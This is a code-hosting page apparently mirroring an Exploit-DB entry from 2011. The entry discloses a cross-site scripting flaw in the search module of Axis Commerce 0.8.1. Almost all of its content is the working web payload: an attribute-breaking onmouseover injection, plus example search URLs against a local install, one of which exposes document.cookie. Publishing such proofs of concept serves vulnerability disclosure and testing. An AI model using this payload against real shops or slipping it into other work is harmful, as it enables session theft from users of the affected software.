bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/17703.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
561 B
Text
Raw Blame History

# Exploit Title: Axis Commerce (E-Commerce System) Stored XSS
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip
# Version: 0.8.1 and previus
# Tested on: Apache (For Windows)
ISSUE
Vulnerable Modules => Search Module
XSS can be done using the command input
Example Code: " onmouseover=prompt(XSS Code) bad="
Example:
http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(906764) bad="
http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(document.cookie) bad="
Reference in a new issue View git blame Copy permalink